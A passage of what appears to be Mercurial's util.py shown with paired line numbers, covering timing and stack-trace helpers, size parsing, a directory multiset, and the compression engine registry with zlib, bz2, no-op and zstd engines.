3153 3386 (10, 0.000000001, _('%.2f ns')),
3154 3387 (1, 0.000000001, _('%.3f ns')),
3155 3388 )
3156 3389
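# A usage sketch, assuming unitcountfn() (defined earlier in this module)
# picks the first row whose threshold is met; the unit table above thus
# selects both the unit and the precision:
#
#   >>> timecount(4.2)
#   '4.200 s'
#   >>> timecount(0.0042)
#   '4.200 ms'
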
3157 3390 _timenesting = [0]
3158 3391
3159 3392 def timed(func):
3160 3393 '''Report the execution time of a function call to stderr.
3161 3394
3162 3395 During development, use as a decorator when you need to measure
3163 3396 the cost of a function, e.g. as follows:
3164 3397
3165 3398 @util.timed
3166 3399 def foo(a, b, c):
3167 3400 pass
3168 3401 '''
3169 3402
3170 3403 def wrapper(*args, **kwargs):
3171 3404 start = timer()
3172 3405 indent = 2
3173 3406 _timenesting[0] += indent
3174 3407 try:
3175 3408 return func(*args, **kwargs)
3176 3409 finally:
3177 3410 elapsed = timer() - start
3178 3411 _timenesting[0] -= indent
3179 3412 stderr.write('%s%s: %s\n' %
3180 3413 (' ' * _timenesting[0], func.__name__,
3181 3414 timecount(elapsed)))
3182 3415 return wrapper
3183 3416
3184 3417 _sizeunits = (('m', 2**20), ('k', 2**10), ('g', 2**30),
3185 3418 ('kb', 2**10), ('mb', 2**20), ('gb', 2**30), ('b', 1))
3186 3419
3187 3420 def sizetoint(s):
3188 3421 '''Convert a size specifier to a byte count.
3189 3422
3190 3423 >>> sizetoint(b'30')
3191 3424 30
3192 3425 >>> sizetoint(b'2.2kb')
3193 3426 2252
3194 3427 >>> sizetoint(b'6M')
3195 3428 6291456
3196 3429 '''
3197 3430 t = s.strip().lower()
3198 3431 try:
3199 3432 for k, u in _sizeunits:
3200 3433 if t.endswith(k):
3201 3434 return int(float(t[:-len(k)]) * u)
3202 3435 return int(t)
3203 3436 except ValueError:
3204 3437 raise error.ParseError(_("couldn't parse size: %s") % s)
3205 3438
3206 3439 class hooks(object):
3207 3440 '''A collection of hook functions that can be used to extend a
3208 3441 function's behavior. Hooks are called in lexicographic order,
3209 3442 based on the names of their sources.'''
3210 3443
3211 3444 def __init__(self):
3212 3445 self._hooks = []
3213 3446
3214 3447 def add(self, source, hook):
3215 3448 self._hooks.append((source, hook))
3216 3449
3217 3450 def __call__(self, *args):
3218 3451 self._hooks.sort(key=lambda x: x[0])
3219 3452 results = []
3220 3453 for source, hook in self._hooks:
3221 3454 results.append(hook(*args))
3222 3455 return results
3223 3456
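# A usage sketch (hook names are illustrative): hooks run sorted by source
# name, regardless of registration order, and the results come back in that
# sorted order.
#
#   >>> h = hooks()
#   >>> h.add('zz-last', lambda x: x * 2)
#   >>> h.add('00-first', lambda x: x + 1)
#   >>> h(3)
#   [4, 6]
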
3224 3457 def getstackframes(skip=0, line=' %-*s in %s\n', fileline='%s:%d', depth=0):
3225 3458 '''Yields lines for a nicely formatted stacktrace.
3226 3459 Skips the 'skip' last entries, then returns the last 'depth' entries.
3227 3460 Each file+linenumber is formatted according to fileline.
3228 3461 Each line is formatted according to line.
3229 3462 If line is None, it yields:
3230 3463 length of longest filepath+line number,
3231 3464 filepath+linenumber,
3232 3465 function
3233 3466
3234 3467 Not to be used in production code, but very convenient while developing.
3235 3468 '''
3236 3469 entries = [(fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3237 3470 for fn, ln, func, _text in traceback.extract_stack()[:-skip - 1]
3238 3471 ][-depth:]
3239 3472 if entries:
3240 3473 fnmax = max(len(entry[0]) for entry in entries)
3241 3474 for fnln, func in entries:
3242 3475 if line is None:
3243 3476 yield (fnmax, fnln, func)
3244 3477 else:
3245 3478 yield line % (fnmax, fnln, func)
3246 3479
3247 3480 def debugstacktrace(msg='stacktrace', skip=0,
3248 3481 f=stderr, otherf=stdout, depth=0):
3249 3482 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3250 3483 Skips the 'skip' entries closest to the call, then shows 'depth' entries.
3251 3484 By default it will flush stdout first.
3252 3485 It can be used everywhere and intentionally does not require a ui object.
3253 3486 Not to be used in production code, but very convenient while developing.
3254 3487 '''
3255 3488 if otherf:
3256 3489 otherf.flush()
3257 3490 f.write('%s at:\n' % msg.rstrip())
3258 3491 for line in getstackframes(skip + 1, depth=depth):
3259 3492 f.write(line)
3260 3493 f.flush()
3261 3494
3262 3495 class dirs(object):
3263 3496 '''a multiset of directory names from a dirstate or manifest'''
3264 3497
3265 3498 def __init__(self, map, skip=None):
3266 3499 self._dirs = {}
3267 3500 addpath = self.addpath
3268 3501 if safehasattr(map, 'iteritems') and skip is not None:
3269 3502 for f, s in map.iteritems():
3270 3503 if s[0] != skip:
3271 3504 addpath(f)
3272 3505 else:
3273 3506 for f in map:
3274 3507 addpath(f)
3275 3508
3276 3509 def addpath(self, path):
3277 3510 dirs = self._dirs
3278 3511 for base in finddirs(path):
3279 3512 if base in dirs:
3280 3513 dirs[base] += 1
3281 3514 return
3282 3515 dirs[base] = 1
3283 3516
3284 3517 def delpath(self, path):
3285 3518 dirs = self._dirs
3286 3519 for base in finddirs(path):
3287 3520 if dirs[base] > 1:
3288 3521 dirs[base] -= 1
3289 3522 return
3290 3523 del dirs[base]
3291 3524
3292 3525 def __iter__(self):
3293 3526 return iter(self._dirs)
3294 3527
3295 3528 def __contains__(self, d):
3296 3529 return d in self._dirs
3297 3530
3298 3531 if safehasattr(parsers, 'dirs'):
3299 3532 dirs = parsers.dirs
3300 3533
3301 3534 def finddirs(path):
3302 3535 pos = path.rfind('/')
3303 3536 while pos != -1:
3304 3537 yield path[:pos]
3305 3538 pos = path.rfind('/', 0, pos)
3306 3539
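# A usage sketch (illustrative paths; assumes the pure-Python dirs class
# rather than the C parsers.dirs replacement above): finddirs() yields
# ancestor directories deepest first, and dirs() counts them so delpath()
# only forgets a directory once its last entry is gone.
#
#   >>> list(finddirs(b'a/b/c'))
#   ['a/b', 'a']
#   >>> d = dirs([b'a/b/c', b'a/d'])
#   >>> sorted(d)
#   ['a', 'a/b']
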
3307 3540 # compression code
3308 3541
3309 3542 SERVERROLE = 'server'
3310 3543 CLIENTROLE = 'client'
3311 3544
3312 3545 compewireprotosupport = collections.namedtuple(u'compenginewireprotosupport',
3313 3546 (u'name', u'serverpriority',
3314 3547 u'clientpriority'))
3315 3548
3316 3549 class compressormanager(object):
3317 3550 """Holds registrations of various compression engines.
3318 3551
3319 3552 This class essentially abstracts the differences between compression
3320 3553 engines to allow new compression formats to be added easily, possibly from
3321 3554 extensions.
3322 3555
3323 3556 Compressors are registered against the global instance by calling its
3324 3557 ``register()`` method.
3325 3558 """
3326 3559 def __init__(self):
3327 3560 self._engines = {}
3328 3561 # Bundle spec human name to engine name.
3329 3562 self._bundlenames = {}
3330 3563 # Internal bundle identifier to engine name.
3331 3564 self._bundletypes = {}
3332 3565 # Revlog header to engine name.
3333 3566 self._revlogheaders = {}
3334 3567 # Wire proto identifier to engine name.
3335 3568 self._wiretypes = {}
3336 3569
3337 3570 def __getitem__(self, key):
3338 3571 return self._engines[key]
3339 3572
3340 3573 def __contains__(self, key):
3341 3574 return key in self._engines
3342 3575
3343 3576 def __iter__(self):
3344 3577 return iter(self._engines.keys())
3345 3578
3346 3579 def register(self, engine):
3347 3580 """Register a compression engine with the manager.
3348 3581
3349 3582 The argument must be a ``compressionengine`` instance.
3350 3583 """
3351 3584 if not isinstance(engine, compressionengine):
3352 3585 raise ValueError(_('argument must be a compressionengine'))
3353 3586
3354 3587 name = engine.name()
3355 3588
3356 3589 if name in self._engines:
3357 3590 raise error.Abort(_('compression engine %s already registered') %
3358 3591 name)
3359 3592
3360 3593 bundleinfo = engine.bundletype()
3361 3594 if bundleinfo:
3362 3595 bundlename, bundletype = bundleinfo
3363 3596
3364 3597 if bundlename in self._bundlenames:
3365 3598 raise error.Abort(_('bundle name %s already registered') %
3366 3599 bundlename)
3367 3600 if bundletype in self._bundletypes:
3368 3601 raise error.Abort(_('bundle type %s already registered by %s') %
3369 3602 (bundletype, self._bundletypes[bundletype]))
3370 3603
3371 3604 # Only expose an external-facing name if one was declared.
3372 3605 if bundlename:
3373 3606 self._bundlenames[bundlename] = name
3374 3607
3375 3608 self._bundletypes[bundletype] = name
3376 3609
3377 3610 wiresupport = engine.wireprotosupport()
3378 3611 if wiresupport:
3379 3612 wiretype = wiresupport.name
3380 3613 if wiretype in self._wiretypes:
3381 3614 raise error.Abort(_('wire protocol compression %s already '
3382 3615 'registered by %s') %
3383 3616 (wiretype, self._wiretypes[wiretype]))
3384 3617
3385 3618 self._wiretypes[wiretype] = name
3386 3619
3387 3620 revlogheader = engine.revlogheader()
3388 3621 if revlogheader and revlogheader in self._revlogheaders:
3389 3622 raise error.Abort(_('revlog header %s already registered by %s') %
3390 3623 (revlogheader, self._revlogheaders[revlogheader]))
3391 3624
3392 3625 if revlogheader:
3393 3626 self._revlogheaders[revlogheader] = name
3394 3627
3395 3628 self._engines[name] = engine
3396 3629
3397 3630 @property
3398 3631 def supportedbundlenames(self):
3399 3632 return set(self._bundlenames.keys())
3400 3633
3401 3634 @property
3402 3635 def supportedbundletypes(self):
3403 3636 return set(self._bundletypes.keys())
3404 3637
3405 3638 def forbundlename(self, bundlename):
3406 3639 """Obtain a compression engine registered to a bundle name.
3407 3640
3408 3641 Will raise KeyError if the bundle type isn't registered.
3409 3642
3410 3643 Will abort if the engine is known but not available.
3411 3644 """
3412 3645 engine = self._engines[self._bundlenames[bundlename]]
3413 3646 if not engine.available():
3414 3647 raise error.Abort(_('compression engine %s could not be loaded') %
3415 3648 engine.name())
3416 3649 return engine
3417 3650
3418 3651 def forbundletype(self, bundletype):
3419 3652 """Obtain a compression engine registered to a bundle type.
3420 3653
3421 3654 Will raise KeyError if the bundle type isn't registered.
3422 3655
3423 3656 Will abort if the engine is known but not available.
3424 3657 """
3425 3658 engine = self._engines[self._bundletypes[bundletype]]
3426 3659 if not engine.available():
3427 3660 raise error.Abort(_('compression engine %s could not be loaded') %
3428 3661 engine.name())
3429 3662 return engine
3430 3663
3431 3664 def supportedwireengines(self, role, onlyavailable=True):
3432 3665 """Obtain compression engines that support the wire protocol.
3433 3666
3434 3667 Returns a list of engines in prioritized order, most desired first.
3435 3668
3436 3669 If ``onlyavailable`` is set, filter out engines that can't be
3437 3670 loaded.
3438 3671 """
3439 3672 assert role in (SERVERROLE, CLIENTROLE)
3440 3673
3441 3674 attr = 'serverpriority' if role == SERVERROLE else 'clientpriority'
3442 3675
3443 3676 engines = [self._engines[e] for e in self._wiretypes.values()]
3444 3677 if onlyavailable:
3445 3678 engines = [e for e in engines if e.available()]
3446 3679
3447 3680 def getkey(e):
3448 3681 # Sort first by priority, highest first. In case of tie, sort
3449 3682 # alphabetically. This is arbitrary, but ensures output is
3450 3683 # stable.
3451 3684 w = e.wireprotosupport()
3452 3685 return -1 * getattr(w, attr), w.name
3453 3686
3454 3687 return list(sorted(engines, key=getkey))
3455 3688
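# A usage sketch, assuming the engines registered later in this module and
# an importable zstd module: server priorities are zstd=50, zlib=20,
# bzip2=0, none=0, with the tie broken alphabetically.
#
#   >>> [e.name() for e in compengines.supportedwireengines(SERVERROLE)]
#   ['zstd', 'zlib', 'bzip2', 'none']
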
3456 3689 def forwiretype(self, wiretype):
3457 3690 engine = self._engines[self._wiretypes[wiretype]]
3458 3691 if not engine.available():
3459 3692 raise error.Abort(_('compression engine %s could not be loaded') %
3460 3693 engine.name())
3461 3694 return engine
3462 3695
3463 3696 def forrevlogheader(self, header):
3464 3697 """Obtain a compression engine registered to a revlog header.
3465 3698
3466 3699 Will raise KeyError if the revlog header value isn't registered.
3467 3700 """
3468 3701 return self._engines[self._revlogheaders[header]]
3469 3702
3470 3703 compengines = compressormanager()
3471 3704
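# A usage sketch: the engines defined below register themselves against this
# instance, after which they can be looked up by engine name or by the
# user-facing bundle spec name.
#
#   >>> compengines['zlib'].bundletype()
#   ('gzip', 'GZ')
#   >>> compengines.forbundlename(b'gzip').name()
#   'zlib'
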
3472 3705 class compressionengine(object):
3473 3706 """Base class for compression engines.
3474 3707
3475 3708 Compression engines must implement the interface defined by this class.
3476 3709 """
3477 3710 def name(self):
3478 3711 """Returns the name of the compression engine.
3479 3712
3480 3713 This is the key the engine is registered under.
3481 3714
3482 3715 This method must be implemented.
3483 3716 """
3484 3717 raise NotImplementedError()
3485 3718
3486 3719 def available(self):
3487 3720 """Whether the compression engine is available.
3488 3721
3489 3722 The intent of this method is to allow optional compression engines
3490 3723 that may not be available in all installations (such as engines relying
3491 3724 on C extensions that may not be present).
3492 3725 """
3493 3726 return True
3494 3727
3495 3728 def bundletype(self):
3496 3729 """Describes bundle identifiers for this engine.
3497 3730
3498 3731 If this compression engine isn't supported for bundles, returns None.
3499 3732
3500 3733 If this engine can be used for bundles, returns a 2-tuple of strings of
3501 3734 the user-facing "bundle spec" compression name and an internal
3502 3735 identifier used to denote the compression format within bundles. To
3503 3736 exclude the name from external usage, set the first element to ``None``.
3504 3737
3505 3738 If bundle compression is supported, the class must also implement
3506 3739 ``compressstream`` and ``decompressorreader``.
3507 3740
3508 3741 The docstring of this method is used in the help system to tell users
3509 3742 about this engine.
3510 3743 """
3511 3744 return None
3512 3745
3513 3746 def wireprotosupport(self):
3514 3747 """Declare support for this compression format on the wire protocol.
3515 3748
3516 3749 If this compression engine isn't supported for compressing wire
3517 3750 protocol payloads, returns None.
3518 3751
3519 3752 Otherwise, returns ``compenginewireprotosupport`` with the following
3520 3753 fields:
3521 3754
3522 3755 * String format identifier
3523 3756 * Integer priority for the server
3524 3757 * Integer priority for the client
3525 3758
3526 3759 The integer priorities are used to order the advertisement of format
3527 3760 support by server and client. The highest integer is advertised
3528 3761 first. Integers with non-positive values aren't advertised.
3529 3762
3530 3763 The priority values are somewhat arbitrary and only used for default
3531 3764 ordering. The relative order can be changed via config options.
3532 3765
3533 3766 If wire protocol compression is supported, the class must also implement
3534 3767 ``compressstream`` and ``decompressorreader``.
3535 3768 """
3536 3769 return None
3537 3770
3538 3771 def revlogheader(self):
3539 3772 """Header added to revlog chunks that identifies this engine.
3540 3773
3541 3774 If this engine can be used to compress revlogs, this method should
3542 3775 return the bytes used to identify chunks compressed with this engine.
3543 3776 Else, the method should return ``None`` to indicate it does not
3544 3777 participate in revlog compression.
3545 3778 """
3546 3779 return None
3547 3780
3548 3781 def compressstream(self, it, opts=None):
3549 3782 """Compress an iterator of chunks.
3550 3783
3551 3784 The method receives an iterator (ideally a generator) of chunks of
3552 3785 bytes to be compressed. It returns an iterator (ideally a generator)
3553 3786 of chunks of bytes representing the compressed output.
3554 3787
3555 3788 Optionally accepts an argument defining how to perform compression.
3556 3789 Each engine treats this argument differently.
3557 3790 """
3558 3791 raise NotImplementedError()
3559 3792
3560 3793 def decompressorreader(self, fh):
3561 3794 """Perform decompression on a file object.
3562 3795
3563 3796 Argument is an object with a ``read(size)`` method that returns
3564 3797 compressed data. Return value is an object with a ``read(size)`` that
3565 3798 returns uncompressed data.
3566 3799 """
3567 3800 raise NotImplementedError()
3568 3801
3569 3802 def revlogcompressor(self, opts=None):
3570 3803 """Obtain an object that can be used to compress revlog entries.
3571 3804
3572 3805 The object has a ``compress(data)`` method that compresses binary
3573 3806 data. This method returns compressed binary data or ``None`` if
3574 3807 the data could not be compressed (too small, not compressible, etc).
3575 3808 The returned data should have a header uniquely identifying this
3576 3809 compression format so decompression can be routed to this engine.
3577 3810 This header should be identified by the ``revlogheader()`` return
3578 3811 value.
3579 3812
3580 3813 The object has a ``decompress(data)`` method that decompresses
3581 3814 data. The method will only be called if ``data`` begins with
3582 3815 ``revlogheader()``. The method should return the raw, uncompressed
3583 3816 data or raise a ``RevlogError``.
3584 3817
3585 3818 The object is reusable but is not thread safe.
3586 3819 """
3587 3820 raise NotImplementedError()
3588 3821
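# A sketch of a minimal third-party engine (hypothetical; 'identity' is not
# registered by this module). Only name() is mandatory; compressstream() and
# decompressorreader() are needed if bundles or the wire protocol are to be
# supported:
#
#   class _identityengine(compressionengine):
#       def name(self):
#           return 'identity'
#       def compressstream(self, it, opts=None):
#           return it    # pass chunks through unmodified
#       def decompressorreader(self, fh):
#           return fh    # reading back is equally a no-op
#
#   compengines.register(_identityengine())
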
3589 3822 class _zlibengine(compressionengine):
3590 3823 def name(self):
3591 3824 return 'zlib'
3592 3825
3593 3826 def bundletype(self):
3594 3827 """zlib compression using the DEFLATE algorithm.
3595 3828
3596 3829 All Mercurial clients should support this format. The compression
3597 3830 algorithm strikes a reasonable balance between compression ratio
3598 3831 and speed.
3599 3832 """
3600 3833 return 'gzip', 'GZ'
3601 3834
3602 3835 def wireprotosupport(self):
3603 3836 return compewireprotosupport('zlib', 20, 20)
3604 3837
3605 3838 def revlogheader(self):
3606 3839 return 'x'
3607 3840
3608 3841 def compressstream(self, it, opts=None):
3609 3842 opts = opts or {}
3610 3843
3611 3844 z = zlib.compressobj(opts.get('level', -1))
3612 3845 for chunk in it:
3613 3846 data = z.compress(chunk)
3614 3847 # Not all calls to compress emit data. It is cheaper to inspect
3615 3848 # here than to feed empty chunks through the generator.
3616 3849 if data:
3617 3850 yield data
3618 3851
3619 3852 yield z.flush()
3620 3853
3621 3854 def decompressorreader(self, fh):
3622 3855 def gen():
3623 3856 d = zlib.decompressobj()
3624 3857 for chunk in filechunkiter(fh):
3625 3858 while chunk:
3626 3859 # Limit output size to limit memory.
3627 3860 yield d.decompress(chunk, 2 ** 18)
3628 3861 chunk = d.unconsumed_tail
3629 3862
3630 3863 return chunkbuffer(gen())
3631 3864
3632 3865 class zlibrevlogcompressor(object):
3633 3866 def compress(self, data):
3634 3867 insize = len(data)
3635 3868 # Caller handles empty input case.
3636 3869 assert insize > 0
3637 3870
3638 3871 if insize < 44:
3639 3872 return None
3640 3873
3641 3874 elif insize <= 1000000:
3642 3875 compressed = zlib.compress(data)
3643 3876 if len(compressed) < insize:
3644 3877 return compressed
3645 3878 return None
3646 3879
3647 3880 # zlib makes an internal copy of the input buffer, doubling
3648 3881 # memory usage for large inputs. So do streaming compression
3649 3882 # on large inputs.
3650 3883 else:
3651 3884 z = zlib.compressobj()
3652 3885 parts = []
3653 3886 pos = 0
3654 3887 while pos < insize:
3655 3888 pos2 = pos + 2**20
3656 3889 parts.append(z.compress(data[pos:pos2]))
3657 3890 pos = pos2
3658 3891 parts.append(z.flush())
3659 3892
3660 3893 if sum(map(len, parts)) < insize:
3661 3894 return ''.join(parts)
3662 3895 return None
3663 3896
3664 3897 def decompress(self, data):
3665 3898 try:
3666 3899 return zlib.decompress(data)
3667 3900 except zlib.error as e:
3668 3901 raise error.RevlogError(_('revlog decompress error: %s') %
3669 3902 forcebytestr(e))
3670 3903
3671 3904 def revlogcompressor(self, opts=None):
3672 3905 return self.zlibrevlogcompressor()
3673 3906
3674 3907 compengines.register(_zlibengine())
3675 3908
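# A usage sketch: compressstream() emits a standard zlib stream, so the
# stdlib can decompress the joined chunks directly.
#
#   >>> out = b''.join(compengines['zlib'].compressstream(iter([b'data'])))
#   >>> zlib.decompress(out)
#   'data'
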
3676 3909 class _bz2engine(compressionengine):
3677 3910 def name(self):
3678 3911 return 'bz2'
3679 3912
3680 3913 def bundletype(self):
3681 3914 """An algorithm that produces smaller bundles than ``gzip``.
3682 3915
3683 3916 All Mercurial clients should support this format.
3684 3917
3685 3918 This engine will likely produce smaller bundles than ``gzip`` but
3686 3919 will be significantly slower, both during compression and
3687 3920 decompression.
3688 3921
3689 3922 If available, the ``zstd`` engine can yield similar or better
3690 3923 compression at much higher speeds.
3691 3924 """
3692 3925 return 'bzip2', 'BZ'
3693 3926
3694 3927 # We declare a protocol name but don't advertise by default because
3695 3928 # it is slow.
3696 3929 def wireprotosupport(self):
3697 3930 return compewireprotosupport('bzip2', 0, 0)
3698 3931
3699 3932 def compressstream(self, it, opts=None):
3700 3933 opts = opts or {}
3701 3934 z = bz2.BZ2Compressor(opts.get('level', 9))
3702 3935 for chunk in it:
3703 3936 data = z.compress(chunk)
3704 3937 if data:
3705 3938 yield data
3706 3939
3707 3940 yield z.flush()
3708 3941
3709 3942 def decompressorreader(self, fh):
3710 3943 def gen():
3711 3944 d = bz2.BZ2Decompressor()
3712 3945 for chunk in filechunkiter(fh):
3713 3946 yield d.decompress(chunk)
3714 3947
3715 3948 return chunkbuffer(gen())
3716 3949
3717 3950 compengines.register(_bz2engine())
3718 3951
3719 3952 class _truncatedbz2engine(compressionengine):
3720 3953 def name(self):
3721 3954 return 'bz2truncated'
3722 3955
3723 3956 def bundletype(self):
3724 3957 return None, '_truncatedBZ'
3725 3958
3726 3959 # We don't implement compressstream because it is hackily handled elsewhere.
3727 3960
3728 3961 def decompressorreader(self, fh):
3729 3962 def gen():
3730 3963 # The input stream doesn't have the 'BZ' header. So add it back.
3731 3964 d = bz2.BZ2Decompressor()
3732 3965 d.decompress('BZ')
3733 3966 for chunk in filechunkiter(fh):
3734 3967 yield d.decompress(chunk)
3735 3968
3736 3969 return chunkbuffer(gen())
3737 3970
3738 3971 compengines.register(_truncatedbz2engine())
3739 3972
3740 3973 class _noopengine(compressionengine):
3741 3974 def name(self):
3742 3975 return 'none'
3743 3976
3744 3977 def bundletype(self):
3745 3978 """No compression is performed.
3746 3979
3747 3980 Use this compression engine to explicitly disable compression.
3748 3981 """
3749 3982 return 'none', 'UN'
3750 3983
3751 3984 # Clients always support uncompressed payloads. Servers don't because,
3752 3985 # unless you are on a fast network, uncompressed payloads can easily
3753 3986 # saturate your network pipe.
3754 3987 def wireprotosupport(self):
3755 3988 return compewireprotosupport('none', 0, 10)
3756 3989
3757 3990 # We don't implement revlogheader because it is handled specially
3758 3991 # in the revlog class.
3759 3992
3760 3993 def compressstream(self, it, opts=None):
3761 3994 return it
3762 3995
3763 3996 def decompressorreader(self, fh):
3764 3997 return fh
3765 3998
3766 3999 class nooprevlogcompressor(object):
3767 4000 def compress(self, data):
3768 4001 return None
3769 4002
3770 4003 def revlogcompressor(self, opts=None):
3771 4004 return self.nooprevlogcompressor()
3772 4005
3773 4006 compengines.register(_noopengine())
3774 4007
3775 4008 class _zstdengine(compressionengine):
3776 4009 def name(self):
3777 4010 return 'zstd'
3778 4011
3779 4012 @propertycache
3780 4013 def _module(self):
3781 4014 # Not all installs have the zstd module available. So defer importing
3782 4015 # until first access.
3783 4016 try:
3784 4017 from . import zstd
3785 4018 # Force delayed import.
3786 4019 zstd.__version__
3787 4020 return zstd
3788 4021 except ImportError:
3789 4022 return None
3790 4023
3791 4024 def available(self):
3792 4025 return bool(self._module)
3793 4026
3794 4027 def bundletype(self):
3795 4028 """A modern compression algorithm that is fast and highly flexible.
3796 4029
3797 4030 Only supported by Mercurial 4.1 and newer clients.
3798 4031
3799 4032 With the default settings, zstd compression is both faster and yields
3800 4033 better compression than ``gzip``. It also frequently yields better
3801 4034 compression than ``bzip2`` while operating at much higher speeds.
3802 4035
3803 4036 If this engine is available and backwards compatibility is not a
3804 4037 concern, it is likely the best available engine.
3805 4038 """
3806 4039 return 'zstd', 'ZS'
3807 4040
3808 4041 def wireprotosupport(self):
3809 4042 return compewireprotosupport('zstd', 50, 50)
3810 4043
3811 4044 def revlogheader(self):
3812 4045 return '\x28'
3813 4046
3814 4047 def compressstream(self, it, opts=None):
3815 4048 opts = opts or {}
3816 4049 # zstd level 3 is almost always significantly faster than zlib
3817 4050 # while providing no worse compression. It strikes a good balance
3818 4051 # between speed and compression.
3819 4052 level = opts.get('level', 3)
3820 4053
3821 4054 zstd = self._module
3822 4055 z = zstd.ZstdCompressor(level=level).compressobj()
3823 4056 for chunk in it:
3824 4057 data = z.compress(chunk)
3825 4058 if data:
3826 4059 yield data
3827 4060
3828 4061 yield z.flush()
3829 4062
3830 4063 def decompressorreader(self, fh):
3831 4064 zstd = self._module
3832 4065 dctx = zstd.ZstdDecompressor()
3833 4066 return chunkbuffer(dctx.read_from(fh))
3834 4067
3835 4068 class zstdrevlogcompressor(object):
3836 4069 def __init__(self, zstd, level=3):
3837 4070 # Writing the content size adds a few bytes to the output. However,
3838 4071 # it allows decompression to be more optimal since we can
3839 4072 # pre-allocate a buffer to hold the result.
3840 4073 self._cctx = zstd.ZstdCompressor(level=level,
3841 4074 write_content_size=True)
3842 4075 self._dctx = zstd.ZstdDecompressor()
3843 4076 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3844 4077 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3845 4078
3846 4079 def compress(self, data):
3847 4080 insize = len(data)
3848 4081 # Caller handles empty input case.
3849 4082 assert insize > 0
3850 4083
3851 4084 if insize < 50:
3852 4085 return None
3853 4086
3854 4087 elif insize <= 1000000:
3855 4088 compressed = self._cctx.compress(data)
3856 4089 if len(compressed) < insize:
3857 4090 return compressed
3858 4091 return None
3859 4092 else:
3860 4093 z = self._cctx.compressobj()
3861 4094 chunks = []
3862 4095 pos = 0
3863 4096 while pos < insize:
3864 4097 pos2 = pos + self._compinsize
3865 4098 chunk = z.compress(data[pos:pos2])
3866 4099 if chunk:
3867 4100 chunks.append(chunk)
3868 4101 pos = pos2
3869 4102 chunks.append(z.flush())
3870 4103
3871 4104 if sum(map(len, chunks)) < insize:
3872 4105 return ''.join(chunks)
3873 4106 return None
3874 4107
3875 4108 def decompress(self, data):
3876 4109 insize = len(data)
3877 4110
3878 4111 try:
3879 4112 # This was measured to be faster than other streaming
3880 4113 # decompressors.
3881 4114 dobj = self._dctx.decompressobj()
3882 4115 chunks = []
3883 4116 pos = 0
3884 4117 while pos < insize:
3885 4118 pos2 = pos + self._decompinsize
3886 4119 chunk = dobj.decompress(data[pos:pos2])
3887 4120 if chunk:
3888 4121 chunks.append(chunk)
3889 4122 pos = pos2
3890 4123 # Frame should be exhausted, so no finish() API.
3891 4124
3892 4125 return ''.join(chunks)
3893 4126 except Exception as e:
3894 4127 raise error.RevlogError(_('revlog decompress error: %s') %
3895 4128 forcebytestr(e))
3896 4129
3897 4130 def revlogcompressor(self, opts=None):
3898 4131 opts = opts or {}
3899 4132 return self.zstdrevlogcompressor(self._module,
3900 4133 level=opts.get('level', 3))
3901 4134
3902 4135 compengines.register(_zstdengine())
3903 4136
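# A usage sketch: unlike the engines above, zstd is optional, so callers
# should consult available() before relying on it.
#
#   engine = compengines['zstd']
#   if engine.available():
#       data = b''.join(engine.compressstream(iter([b'payload'])))
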
3904 4137 def bundlecompressiontopics():
3905 4138 """Obtains a list of available bundle compressions for use in help."""
3906 4139 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3907 4140 items = {}
3908 4141
3909 4142 # We need to format the docstring. So use a dummy object/type to hold it
3910 4143 # rather than mutating the original.
3911 4144 class docobject(object):
3912 4145 pass
3913 4146
3914 4147 for name in compengines:
3915 4148 engine = compengines[name]
3916 4149
3917 4150 if not engine.available():
3918 4151 continue
3919 4152
3920 4153 bt = engine.bundletype()
3921 4154 if not bt or not bt[0]:
3922 4155 continue
3923 4156
3924 4157 doc = pycompat.sysstr('``%s``\n %s') % (
3925 4158 bt[0], engine.bundletype.__doc__)
3926 4159
3927 4160 value = docobject()
3928 4161 value.__doc__ = doc
3929 4162 value._origdoc = engine.bundletype.__doc__
3930 4163 value._origfunc = engine.bundletype
3931 4164
3932 4165 items[bt[0]] = value
3933 4166
3934 4167 return items
3935 4168
3936 4169 i18nfunctions = bundlecompressiontopics().values()
3937 4170
3938 4171 # convenient shortcut
3939 4172 dst = debugstacktrace
3940 4173
3941 4174 def safename(f, tag, ctx, others=None):
3942 4175 """
3943 4176 Generate a name that it is safe to rename f to in the given context.
3944 4177
3945 4178 f: filename to rename
3946 4179 tag: a string tag that will be included in the new name
3947 4180 ctx: a context, in which the new name must not exist
3948 4181 others: a set of other filenames that the new name must not be in
3949 4182
3950 4183 Returns a file name of the form oldname~tag[~number] which does not exist
3951 4184 in the provided context and is not in the set of other names.
3952 4185 """
3953 4186 if others is None:
3954 4187 others = set()
3955 4188
3956 4189 fn = '%s~%s' % (f, tag)
3957 4190 if fn not in ctx and fn not in others:
3958 4191 return fn
3959 4192 for n in itertools.count(1):
3960 4193 fn = '%s~%s~%s' % (f, tag, n)
3961 4194 if fn not in ctx and fn not in others:
3962 4195 return fn
3963 4196
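# A usage sketch ('fakectx' is a hypothetical stand-in; any object
# supporting the 'in' operator works as the context):
#
#   >>> class fakectx(object):
#   ...     def __contains__(self, fn):
#   ...         return fn == b'foo~bak'
#   >>> safename(b'foo', b'bak', fakectx(), others={b'foo~bak~1'})
#   'foo~bak~2'
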
3964 4197 def readexactly(stream, n):
3965 4198 '''read n bytes from stream.read and abort if fewer were available'''
3966 4199 s = stream.read(n)
3967 4200 if len(s) < n:
3968 4201 raise error.Abort(_("stream ended unexpectedly"
3969 4202 " (got %d bytes, expected %d)")
3970 4203 % (len(s), n))
3971 4204 return s
3972 4205
3973 4206 def uvarintencode(value):
3974 4207 """Encode an unsigned integer value to a varint.
3975 4208
3976 4209 A varint is a variable length integer of 1 or more bytes. Each byte
3977 4210 except the last has the most significant bit set. The lower 7 bits of
3978 4211 each byte store the integer's binary value, least significant group
3979 4212 first.
3980 4213
3981 4214 >>> uvarintencode(0)
3982 4215 '\\x00'
3983 4216 >>> uvarintencode(1)
3984 4217 '\\x01'
3985 4218 >>> uvarintencode(127)
3986 4219 '\\x7f'
3987 4220 >>> uvarintencode(1337)
3988 4221 '\\xb9\\n'
3989 4222 >>> uvarintencode(65536)
3990 4223 '\\x80\\x80\\x04'
3991 4224 >>> uvarintencode(-1)
3992 4225 Traceback (most recent call last):
3993 4226 ...
3994 4227 ProgrammingError: negative value for uvarint: -1
3995 4228 """
3996 4229 if value < 0:
3997 4230 raise error.ProgrammingError('negative value for uvarint: %d'
3998 4231 % value)
3999 4232 bits = value & 0x7f
4000 4233 value >>= 7
4001 4234 bytes = []
4002 4235 while value:
